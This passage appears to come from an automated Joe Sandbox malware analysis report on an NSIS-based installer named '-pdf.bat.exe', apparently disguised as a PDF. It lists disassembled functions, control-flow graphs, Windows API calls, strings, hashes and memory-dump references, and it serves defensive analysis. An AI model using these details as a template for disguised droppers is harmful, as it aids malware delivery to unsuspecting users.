                                                                                                                                                • SetFileTime.KERNELBASE(00000000,000000FF,00000000,000000FF,?,00000000,00000000,00000000,000000EA,00000000,Call,40000000,00000001,Call,00000000), ref: 00401A5A
                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00401A61
                                                                                                                                                • lstrcatW.KERNEL32(Call,00000000,Call,000000E9), ref: 00401A82
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Anvilled$C:\Users\user\AppData\Local\Temp\nsq66FB.tmp$C:\Users\user\AppData\Local\Temp\nsq66FB.tmp\System.dll$Call
                                                                                                                                                • API String ID: 3895412863-1182375140
                                                                                                                                                • Opcode ID: 68950bb1ebeb6225cd62330d136d113d7f3aaaaab8d8f59b6ae84e2e14c53e75
                                                                                                                                                • Instruction ID: a1785f87335a1d6f00f335b021900493bb5bdccd3db236d5a22e690d77315129
                                                                                                                                                • Opcode Fuzzy Hash: 68950bb1ebeb6225cd62330d136d113d7f3aaaaab8d8f59b6ae84e2e14c53e75
                                                                                                                                                • Instruction Fuzzy Hash: 89D1D871204301ABD710AF26CD85D2F76A8EF85758F110A3FF456B22E1DB7CD902966E
                                                                                                                                                Function 0040348F Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 200memoryCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 566 40348f-4034db GetTickCount GetModuleFileNameW call 406a30 569 4034e7-403517 call 406c2f call 406e25 call 406c2f GetFileSize 566->569 570 4034dd-4034e2 566->570 578 40351d 569->578 579 40360f-40361e call 4033e9 569->579 571 4036b1-4036bb 570->571 581 403524-40354a call 40311b 578->581 584 403624-403626 579->584 585 4036ac 579->585 589 403550-403557 581->589 590 4036a4-4036ab call 4033e9 581->590 587 403628-403640 call 403131 call 406a5d 584->587 588 40364f-40369b GlobalAlloc call 407d89 call 406b6b CreateFileW 584->588 585->571 612 403645-403647 587->612 615 40369d-4036a2 588->615 616 4036be-4036f3 call 403131 call 4032c7 588->616 594 4035d5-4035d8 589->594 595 403559-403572 call 4067c9 589->595 590->585 600 4035e2-4035e8 594->600 601 4035da-4035e1 call 4033e9 594->601 595->600 610 403574-40357c 595->610 606 4035ea-4035f9 call 406f51 600->606 607 4035fd-403605 600->607 601->600 606->607 607->581 611 40360b 607->611 610->600 617 40357e-403586 610->617 611->579 612->585 618 403649-40364d 612->618 615->571 626 4036f8-4036fc 616->626 617->600 619 403588-403590 617->619 618->585 618->588 619->600 621 403592-40359a 619->621 621->600 623 40359c-4035bb 621->623 623->585 625 4035c1-4035c7 623->625 625->611 627 4035c9-4035cf 625->627 626->585 628 4036fe-403710 626->628 627->600 629 4035d1-4035d3 627->629 630 403712 628->630 631 403718-40371b 628->631 629->600 630->631 632 40371e-403726 631->632 632->632 633 403728-403742 call 4067c9 632->633 633->571
                                                                                                                                                APIs
                                                                                                                                                • GetTickCount.KERNEL32 ref: 004034A1
                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\-pdf.bat.exe,00000400), ref: 004034BD
                                                                                                                                                  • Part of subcall function 00406A30: GetFileAttributesW.KERNELBASE(00000003,004034D0,C:\Users\user\Desktop\-pdf.bat.exe,80000000,00000003), ref: 00406A34
                                                                                                                                                  • Part of subcall function 00406A30: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000000,00000000), ref: 00406A54
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\-pdf.bat.exe,C:\Users\user\Desktop\-pdf.bat.exe,80000000,00000003), ref: 00403507
                                                                                                                                                • GlobalAlloc.KERNELBASE(?,?), ref: 00403655
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\-pdf.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                • API String ID: 2803837635-534134801
                                                                                                                                                • Opcode ID: 599ca7be9194ffd7aba6a4343ff8315617eef4df89bd3b83fc00f7988b37868b
                                                                                                                                                • Instruction ID: 3b142060e7b9412fd979dc1fb42ba0df29582307c8f1f7093b8b137cbf00f437
                                                                                                                                                • Opcode Fuzzy Hash: 599ca7be9194ffd7aba6a4343ff8315617eef4df89bd3b83fc00f7988b37868b
                                                                                                                                                • Instruction Fuzzy Hash: 2D61F571640300ABD730AF24DD86B5A7BA8EB84715F100A3FF541B72E1CB3D9A458B5E
                                                                                                                                                Function 00405E3D Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 76stringwindowCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 636 405e3d-405e49 637 405f1a-405f1e 636->637 638 405e4f-405e62 636->638 639 405e64-405e69 call 405fbd 638->639 640 405e6e-405e7e lstrlenW 638->640 639->640 642 405e80-405e8f lstrlenW 640->642 643 405ea3 640->643 644 405e95-405ea1 lstrcatW 642->644 645 405f17-405f19 642->645 646 405ea8-405eab 643->646 644->646 645->637 647 405eba-405ebd 646->647 648 405ead-405eb4 SetWindowTextW 646->648 649 405f05-405f07 647->649 650 405ebf-405f03 SendMessageW * 3 647->650 648->647 649->645 651 405f09-405f0f 649->651 650->649 651->645
                                                                                                                                                APIs
                                                                                                                                                • lstrlenW.KERNEL32(00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E6F
                                                                                                                                                • lstrlenW.KERNEL32(?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E81
                                                                                                                                                • lstrcatW.KERNEL32(00424230,?,?,00424230,C:\Users\user\Desktop,00000000,00000000), ref: 00405E9C
                                                                                                                                                • SetWindowTextW.USER32(00424230,00424230), ref: 00405EB4
                                                                                                                                                • SendMessageW.USER32(?), ref: 00405EDB
                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405EF6
                                                                                                                                                • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405F03
                                                                                                                                                  • Part of subcall function 00405FBD: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,?,00403466), ref: 0040618F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                                                                                                                                • String ID: 0BB$0BB$0BB$0BB$C:\Users\user\Desktop
                                                                                                                                                • API String ID: 1759915248-3281311192
                                                                                                                                                • Opcode ID: 2475f87d803c5ef63a02e9ec05c0eb26efa1af4e36a7e4118f10b924440d8630
                                                                                                                                                • Instruction ID: 0ce1c44fb447bcfc908b7bbe79f9094619b51c0f52104d818297a9f3ba0da135
                                                                                                                                                • Opcode Fuzzy Hash: 2475f87d803c5ef63a02e9ec05c0eb26efa1af4e36a7e4118f10b924440d8630
                                                                                                                                                • Instruction Fuzzy Hash: FA21F532A056546BD310AF55DD40A5BFB9CEF94350F44043EF988A3291C7BC5D004AAE
                                                                                                                                                Function 00405FBD Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 216stringCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 652 405fbd-405fc6 653 405fc8-405fd7 652->653 654 405fd9-405ff4 652->654 653->654 655 405ff6-406001 654->655 656 40600b-406012 654->656 655->656 659 406003-406007 655->659 657 406218-40621f 656->657 658 406018-40601b 656->658 661 406221-406228 call 406c2f 657->661 662 40622a 657->662 660 40601c-40602a 658->660 659->656 663 406030-40603b 660->663 664 406213-406217 660->664 666 40622c-406232 661->666 662->666 667 406041-406085 663->667 668 4061ec 663->668 664->657 672 406197-40619a 667->672 673 40608b-40609a 667->673 670 4061fa 668->670 671 4061ee-4061f8 668->671 674 4061fd 670->674 671->674 675 4061d0-4061d3 672->675 676 40619c-40619f 672->676 677 4060d9-4060dc 673->677 678 40609c-4060c7 call 406a8c 673->678 681 4061ff-40620d 674->681 683 4061d5-4061d9 call 405fbd 675->683 684 4061de-4061ea lstrlenW 675->684 679 4061a1-4061ad call 406734 676->679 680 4061af-4061c6 call 406c2f 676->680 685 4060de-4060ea GetSystemDirectoryW 677->685 686 4060ef-4060f2 677->686 697 40617d-406182 678->697 698 4060cd-4060d4 call 405fbd 678->698 679->684 680->684 701 4061c8-4061ce call 406e52 680->701 681->660 681->664 683->684 684->681 691 406179 685->691 692 406102 686->692 693 4060f4-406100 GetWindowsDirectoryW 686->693 691->697 694 406104-406120 692->694 693->691 699 406132-406152 call 4069fb 694->699 700 406122-406126 694->700 697->701 703 406184-406187 697->703 698->697 713 406154-40616a SHGetPathFromIDListW CoTaskMemFree 699->713 714 40616c-406173 699->714 708 40612e-406130 700->708 701->684 703->701 707 406189-406195 lstrcatW 703->707 707->701 708->699 711 406175 708->711 711->691 713->711 713->714 714->694 714->711
                                                                                                                                                APIs
                                                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060E4
                                                                                                                                                  • Part of subcall function 00406C2F: lstrcpynW.KERNEL32(?,?,00000400,00403979,00428D40,NSIS Error), ref: 00406C3C
                                                                                                                                                  • Part of subcall function 00405FBD: SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406156
                                                                                                                                                  • Part of subcall function 00405FBD: CoTaskMemFree.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403466,00000000), ref: 00406162
                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00424230,?,?,?,?,C:\Users\user\Desktop,00000000,00000000), ref: 004060FA
                                                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,?,00403466), ref: 0040618F
                                                                                                                                                • lstrlenW.KERNEL32(Call,00424230,?,?,?,?,C:\Users\user\Desktop,00000000,00000000), ref: 004061DF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrcpynlstrlen
                                                                                                                                                • String ID: 0BB$Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                • API String ID: 698176107-1118408401
                                                                                                                                                • Opcode ID: c4305dca4c3c9a80663fe91b25f080845fb2b885571739180ef8a7dc8815ff10
                                                                                                                                                • Instruction ID: 652daa6bf86f9d3fc302909022c953cc0e89febb2bd57c9f500c2de9f400e0ee
                                                                                                                                                • Opcode Fuzzy Hash: c4305dca4c3c9a80663fe91b25f080845fb2b885571739180ef8a7dc8815ff10
                                                                                                                                                • Instruction Fuzzy Hash: 586105312042159BD710AF299C80A3B76A4AF99310F12443FF986FB2D1D63CC9268B6D
                                                                                                                                                Function 0040291D Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 166fileCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 779 40291d-402934 call 403002 782 402ea1-402ea5 779->782 783 40293a-40294b 779->783 787 402eab-402eb7 782->787 785 402951-402965 call 406d3a 783->785 786 402aa2-402aac 783->786 785->786 792 40296b-402973 785->792 791 402ab5-402aba 786->791 793 402ad3-402ae2 SetFilePointer 791->793 794 402abc-402ac1 791->794 795 402975-40297a 792->795 793->786 796 402ac3-402ac6 794->796 797 402ac8-402ad1 794->797 798 402980-40299c ReadFile 795->798 799 402a33-402a37 795->799 796->793 796->797 797->786 798->786 800 4029a2-4029ac 798->800 801 402a39-402a3b 799->801 802 402a4c-402a5b call 406a5d 799->802 800->786 804 4029b2-4029bf 800->804 801->802 805 402a3d-402a46 call 406599 801->805 802->786 812 402a5d-402a61 802->812 807 402ae4-402aee call 406734 804->807 808 4029c5-4029dc MultiByteToWideChar 804->808 805->786 814 402a48 805->814 807->782 807->787 808->812 813 4029de-4029e4 808->813 816 402a65-402a69 812->816 817 4029e6-4029f4 813->817 814->802 816->807 818 402a6b-402a76 816->818 817->816 819 4029f6-402a2f SetFilePointer MultiByteToWideChar 817->819 818->791 820 402a78-402a7d 818->820 819->817 821 402a31 819->821 820->791 822 402a7f-402a92 820->822 821->812 822->786 823 402a94-402a9c 822->823 823->786 823->795
                                                                                                                                                APIs
                                                                                                                                                • ReadFile.KERNELBASE(00000000,?,?,?), ref: 00402994
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004029D4
                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402A07
                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,00000001,?,00000001,?,?,?,?,?,00000001), ref: 00402A1F
                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,00000000,?,00000002), ref: 00402ADC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$ByteCharMultiPointerWide$Read
                                                                                                                                                • String ID: 9
                                                                                                                                                • API String ID: 1439708474-2366072709
                                                                                                                                                • Opcode ID: cbce69830b2ac27408b95c64c0cddadcdc42c8f250a6c4142035317a81010454
                                                                                                                                                • Instruction ID: eba2a45eeb10f73dc6eed4f84907f68d60de0f16478c8bc33572b7d083648977
                                                                                                                                                • Opcode Fuzzy Hash: cbce69830b2ac27408b95c64c0cddadcdc42c8f250a6c4142035317a81010454
                                                                                                                                                • Instruction Fuzzy Hash: 6A5149B1618301AFD724DF15CA44A2BB7E8BFD5304F00483FF981A62D0DBB9D9458B2A
                                                                                                                                                Function 004062B3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 824 4062b3-4062d3 GetSystemDirectoryW 825 4062d5-4062d7 824->825 826 4062ed 824->826 825->826 827 4062d9-4062e4 825->827 828 4062ef 826->828 827->828 829 4062e6-4062eb 827->829 830 4062f4-406321 wsprintfW LoadLibraryExW 828->830 829->830
                                                                                                                                                APIs
                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004062CA
                                                                                                                                                • wsprintfW.USER32 ref: 00406306
                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 0040631A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                                                • Opcode ID: 714dfd95af2ce998ffd3f91a4f209d2bb5680a21a200567e99444b52dbb044f1
                                                                                                                                                • Instruction ID: 3c81b89deb225ca8298b9d33e2fe5aa7d3ba7ba3c7b224130f881f219ff7cca8
                                                                                                                                                • Opcode Fuzzy Hash: 714dfd95af2ce998ffd3f91a4f209d2bb5680a21a200567e99444b52dbb044f1
                                                                                                                                                • Instruction Fuzzy Hash: 35F0967150151457D710B764DE0DB9737A8AF00304F5044BEA546F21C0EBBCDA54C79C
                                                                                                                                                Function 00406B6B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 35COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 831 406b6b-406b77 832 406b78-406baa GetTickCount GetTempFileNameW 831->832 833 406bb5 832->833 834 406bac-406bae 832->834 836 406bb7-406bba 833->836 834->832 835 406bb0-406bb3 834->835 835->836
                                                                                                                                                APIs
                                                                                                                                                • GetTickCount.KERNEL32 ref: 00406B87
                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403DD7,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,776A3420,00403ACC), ref: 00406BA2
                                                                                                                                                Strings
                                                                                                                                                • n, xrefs: 00406B79
                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406B70
                                                                                                                                                • a, xrefs: 00406B80
                                                                                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406B74
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.37955725325.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 00000000.00000002.37955697201.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955756499.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955785976.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                • Associated: 00000000.00000002.37955933202.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_-pdf.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                                                                                                                                • API String ID: 1716503409-3027303449
                                                                                                                                                • Opcode ID: 7d0d4397dd5f524cd1bb2981e1ab45d43d420a4297ed1305e9605d287a9de6af
                                                                                                                                                • Instruction ID: 03f97ff025160759833fd1c5b54d4c15cc798ac05920b73cd7f9cb615ebaa677
                                                                                                                                                • Opcode Fuzzy Hash: 7d0d4397dd5f524cd1bb2981e1ab45d43d420a4297ed1305e9605d287a9de6af
                                                                                                                                                • Instruction Fuzzy Hash: 63F0BEB2200218BBEB148F44DC09BDE777EEF90710F10807BE941AB180E6F06A5483A4
                                                                                                                                                Function 0040225D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81libraryCOMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
